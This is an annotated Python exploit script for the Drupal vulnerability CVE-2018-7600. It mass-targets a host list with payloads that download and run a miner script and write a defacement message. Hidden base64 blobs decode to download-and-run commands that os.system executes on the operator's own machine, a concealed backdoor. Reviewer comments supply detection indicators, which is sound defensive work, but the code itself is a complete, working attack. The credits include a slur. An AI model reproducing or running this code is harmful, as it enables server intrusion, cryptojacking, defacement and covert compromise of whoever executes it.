- #!/usr/bin/env
- import sys
- import requests
- import os
- import base64
- from multiprocessing.dummy import Pool
- ##################################################
- # CVE-2018-7600 Exploit #
- ##################################################
- # Author: xJesterino #
- # Twitter: @xJesterino #
- ##################################################
- # Greetz To #
- ##################################################
- # Drought #
- # Zenco #
- # Syntax #
- # SandNigga #
- ##################################################
- # You shouldn't have this. #
- # If you have this, you're a cool dude. <3 #
- ##################################################
- # Ignore what I put above as of 5/5/2018 #
- # Releasing this exploit cus fuck the world #
- # #
- # This exploit is a fucking joke. #
- # Drupalgeddon2 then a week later Drupalgeddon3 #
- ##################################################
# Startup banner: prints the author credits to stdout. It has no effect on the
# requests built below.
- print ('##################################################')
- print ('# CVE-2018-7600 Exploit #')
- print ('##################################################')
- print ('# Author: xJesterino #')
- print ('# Twitter: @xJesterino #')
- print ('##################################################')
- print ('# Greetz To #')
- print ('##################################################')
- print ('# Drought #')
- print ('# Zenco #')
- print ('# Syntax #')
- print ('# SandNigga #')
- print ('##################################################')
# Module-level switches read by run(): each flag that is True produces one
# POST per target. `verify` is forwarded as requests' verify= argument, where
# False turns TLS certificate validation off; run() builds http:// URLs.
- sendMiner = True
- sendMessage = True
- verify = False
# Detection note: this fixed User-Agent value is attached to every request the
# script sends (headers= in run), so it is a direct search term for web server
# and proxy logs.
- headers = {'User-Agent': 'Mozilla 5.0 | xJesterino Was Here | Shoutout to drought!'}
# Shell command string embedded in minerPayload: fetch bins.sh from the host in
# the URL, mark it executable, run it, delete it.
# NOTE(review): 1.1.1.1 looks like a placeholder the author expected users to
# replace - confirm before treating it as an indicator.
- evil = "wget http://1.1.1.1/bins.sh; chmod +x bins.sh; ./bins.sh; rm -rf bins.sh"
# Both dicts are form fields for Drupal's user registration form. They set
# render-array properties (#post_render, #type, #markup) on the mail element,
# which is the request shape for CVE-2018-7600 named in the file header.
# Defender notes:
#   * form parameters whose keys contain '#'-prefixed names on user/register
#     are what to look for in request logs and WAF rules;
#   * the message command pipes its text through `tee ReadMeCVE.txt`, so a file
#     of that name in the web process's working directory is a host-side
#     indicator that the request was executed;
#   * the remedy is a Drupal core release patched for CVE-2018-7600.
- messagePayload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'echo "xJesterino is a god. Shout out to Drought. All your devices are belong to us. | Follow us on twitter: @xJesterino @decayable | Guess who pissed in your cheerios?" | tee ReadMeCVE.txt'}
- minerPayload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': ' '+evil+' '}
# Loads the target list: the file named by argv[1] is read line by line and
# each line is stripped. The file object is never closed explicitly.
# Only IndexError (argv[1] missing) is handled; an unreadable or missing file
# raises uncaught.
- try:
- target = [i.strip() for i in open(sys.argv[1], mode='r').readlines()]
# NOTE(review): the two base64 strings below are unrelated to the Drupal
# requests. At the end of the file they are decoded and passed to os.system(),
# i.e. they run on the machine of whoever executes this script.
#   requestValue decodes to a shell one-liner that changes to /tmp, downloads
#   0.sh from skiddump[.]xyz with curl, runs it with sh, deletes it and clears
#   and rewrites the shell history.
#   sendValue decodes to a one-liner that changes to /tmp, downloads a file
#   named .x from r00ts.truthdealmodz[.]pw (wget, then curl), makes it
#   executable, starts it under nohup with all output discarded and deletes it.
# Hostnames are defanged here; both are indicators for a host on which this
# file was run, not for the Drupal servers in the target list.
- requestValue = "Y2QgL3RtcCAmJiBjdXJsIC1PIGh0dHA6Ly9za2lkZHVtcC54eXovMC5zaCAmJiBzaCAwLnNoO3JtIC1yZiAwLnNoIDtjbGVhcjtoaXN0b3J5IC1jOyBjbGVhcjtoaXN0b3J5IC13"
- sendValue = "Y2QgL3RtcDsgd2dldCAtcSBodHRwOi8vcjAwdHMudHJ1dGhkZWFsbW9kei5wdy8ueCAgOyAgY3VybCAtTyBodHRwOi8vcjAwdHMudHJ1dGhkZWFsbW9kei5wdy8ueCAgO2NobW9kICt4IC54OyBub2h1cCAuLy54IDwvZGV2L251bGwgPi9kZXYvbnVsbCAyPiYxO3JtIC1yZiAueA=="
- except IndexError:
- exit('Usage: exploit.py list.txt threads')
# run(targetLine): worker invoked once per entry of the target list by the
# thread pool at the end of the file. It prefixes the entry with http://,
# appends Drupal's user/register AJAX path and POSTs the payload dicts selected
# by the sendMiner / sendMessage flags, each with a 5 second timeout.
# NOTE(review): indentation was lost in this paste, so the exact nesting of the
# two try blocks and the position of the print relative to them cannot be
# determined from the page.
- def run(targetLine):
- try:
- try:
- targetLine = 'http://'+targetLine+'/'
# Detection note: the query string below (element_parents=account/mail/%23value
# together with ajax_form=1 and _wrapper_format=drupal_ajax on user/register) is
# the access-log signature of these requests.
- url = str(targetLine) + 'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
- if sendMiner:
- minerRequest = requests.post(url, data=minerPayload, verify=verify, headers=headers, timeout=5)
- if sendMessage:
- messageRequest = requests.post(url, data=messagePayload, verify=verify, headers=headers, timeout=5)
# The response objects are assigned but never inspected, and request errors are
# discarded, so nothing here establishes whether a host was vulnerable.
- except requests.exceptions.RequestException as e:
- pass
# The message is printed regardless of the response; it only records that the
# entry was processed.
- print ('[+] Attempting: '+targetLine);
# Bare except: every remaining exception is swallowed silently.
- except:
- pass
# Pool is multiprocessing.dummy.Pool, i.e. a pool of threads; its size is
# int(argv[2]). Only a missing argv[2] (IndexError) is handled; a non-numeric
# value raises ValueError uncaught.
- try:
- multiThreads = Pool(int(sys.argv[2]))
- except IndexError:
- exit('Usage: exploit.py list.txt threads')
# NOTE(review): the next four lines base64-decode requestValue and sendValue
# (defined where the target list is loaded) and pass the results to
# os.system(). As written they execute on the local machine, before
# multiThreads.map() contacts any target. The blobs decode to
# download-and-run shell one-liners, so a host on which this file was executed
# should be examined as potentially compromised. Presumably this is a backdoor
# aimed at people reusing the script - the page does not state the intent.
- reValue = str(base64.b64decode(requestValue))
- seValue = str(base64.b64decode(sendValue))
- os.system(reValue)
- os.system(seValue)
# map() blocks until run() has been called for every entry in target;
# close() and join() then shut the pool down.
- multiThreads.map(run, target)
- multiThreads.close()
- multiThreads.join()
- print("Finished File!")